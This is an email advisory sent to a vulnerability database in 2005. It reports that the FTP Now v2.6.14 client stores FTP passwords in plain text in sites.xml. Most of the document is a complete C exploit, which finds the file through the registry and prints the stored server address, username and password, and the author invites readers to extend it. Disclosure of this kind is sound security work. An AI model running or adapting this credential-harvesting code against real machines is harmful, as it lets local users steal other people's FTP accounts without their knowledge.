From: kozan(at)netmagister.com
To: moderators(at)osvdb.org
Date: Thu,  7 Apr 2005 01:18:12 +0300
Subject: FTP Now v2.6.14 discloses passwords to local users

---------------------
Application:
---------------------

FTP Now v2.6.14


---------------------
Introduction:
---------------------

Vendor: www.network-client.com

Vendor Description: FTP Now is a fast, multi-threaded Windows
FTP client software with the look-and-feel of Windows Explorer.
It makes moving files between the Internet and your computer as
simple as local file manipulation. Whether uploading a Web page
and image, downloading the music and software or transferring
various files between your computer and any FTP server, FTP Now
will get the job done easily and fast, it is suitable for
beginner and expert.



---------------------
Bug:
---------------------


FTP Now v2.6.14 stores all the information and passwords in
"Program Files\FTP Now\sites.xml" file in plain text format
without crypting and can be viewed by a local user.


"sites.xml" Algorithm :

<SITE name="My FTP Site" >
<ADDRESS>ftp.myhost.com</ADDRESS>
<PORT>21</PORT>
<PASVMODE>0</PASVMODE>
<LOGIN>myftpuser</LOGIN>
<PASSWORD>myftppass</PASSWORD>
<REMOTEPATH></REMOTEPATH>
<LOCALPATH></LOCALPATH>
<RETRIES>3</RETRIES>
<RETRYDELAY>10</RETRYDELAY>
<DESCRIPTION></DESCRIPTION>
</SITE>




---------------------
Vendor Confirmed:
---------------------
No.


---------------------
Fix:
---------------------
There is no solution at the time of this entry.



---------------------
Exploit:
---------------------


/*******************************************************************

FTP Now v2.6.14 Local Password Disclosure Exploit by Kozan

Application: FTP Now v2.6.14 (and prior versions)
Vendor:www.network-client.com
Vulnerable Description: FTP Now v2.6.14 discloses passwords
to local users.


Discovered & Coded by: Kozan
Credits to ATmaCA
Web: www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan(at)netmagister.com

*******************************************************************/

#include <stdio.h>
#include <string.h>
#include <windows.h>


HKEY hKey;
#define BUFSIZE 100
char prgfiles[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;


int adresal(char *FilePath,char *Str)
{
        char kr;
        int Sayac=0;
        int Offset=-1;
        FILE *di;
        di=fopen(FilePath,"rb");

        if( di == NULL )
        {
                fclose(di);
                return -1;
        }

        while(!feof(di))
        {
                Sayac++;
                for(int i=0;i<strlen(Str);i++)
                {
                        kr=getc(di);
                        if(kr != Str[i])
                        {
                                if( i>0 )
                                {
                                        fseek(di,Sayac+1,SEEK_SET);
                                }
                                break;
                        }
                        if( i > ( strlen(Str)-2 ) )
                        {
                                Offset = ftell(di)-strlen(Str);
                                fclose(di);
                                return Offset;
                        }
                }
        }
        fclose(di);
        return -1;
}


char *oku(char *FilePath,char *Str)
{

        FILE *di;
        char cr;
        int i=0;
        char Feature[500];

        int Offset = adresal(FilePath,Str);

        if( Offset == -1 )
                return "";

        if( (di=fopen(FilePath,"rb")) == NULL )
                return "";

        fseek(di,Offset+strlen(Str),SEEK_SET);

        while(!feof(di))
        {
                cr=getc(di);
                if(cr == '<')
                        break;
                Feature[i] = cr;
                i++;
        }

        Feature[i] = '\0';
        fclose(di);
        return Feature;
}




int main()
{
	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,
                    "SOFTWARE\\Microsoft\\Windows\\CurrentVersion",
                    0,
                    KEY_QUERY_VALUE,
                    &hKey) == ERROR_SUCCESS)
    {

		lRet = RegQueryValueEx( hKey, "ProgramFilesDir", NULL, NULL,
						       (LPBYTE) prgfiles, &dwBufLen);

        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) )
		{
			RegCloseKey(hKey);
			printf("An error occured!\n");
            exit(1);
        }

        RegCloseKey(hKey);

    }
	else
	{
        RegCloseKey(hKey);
		printf("An error occured!\n");
        exit(1);
    }

	strcat(prgfiles,"\\FTP Now\\sites.xml");


	printf("FTP Now <= v2.6.14 Local Exploit by Kozan\n");
	printf("Credits to ATmaCA\n");
	printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
	printf("This exploit only show the first profile and its password.\n");
	printf("You may improve it freely...\n\n");

	char FtpAddress[BUFSIZE], FtpUsername[BUFSIZE], FtpPassword[BUFSIZE];

	strcpy(FtpAddress,oku(prgfiles,"<ADDRESS>"));
	strcpy(FtpUsername,oku(prgfiles,"<LOGIN>"));
	strcpy(FtpPassword,oku(prgfiles,"<PASSWORD>"));

	printf("Ftp Address   : %s\n",FtpAddress);
	printf("Ftp Username  : %s\n",FtpUsername);
	printf("Ftp Password  : %s\n",FtpPassword);

	return 0;
}






Kozan...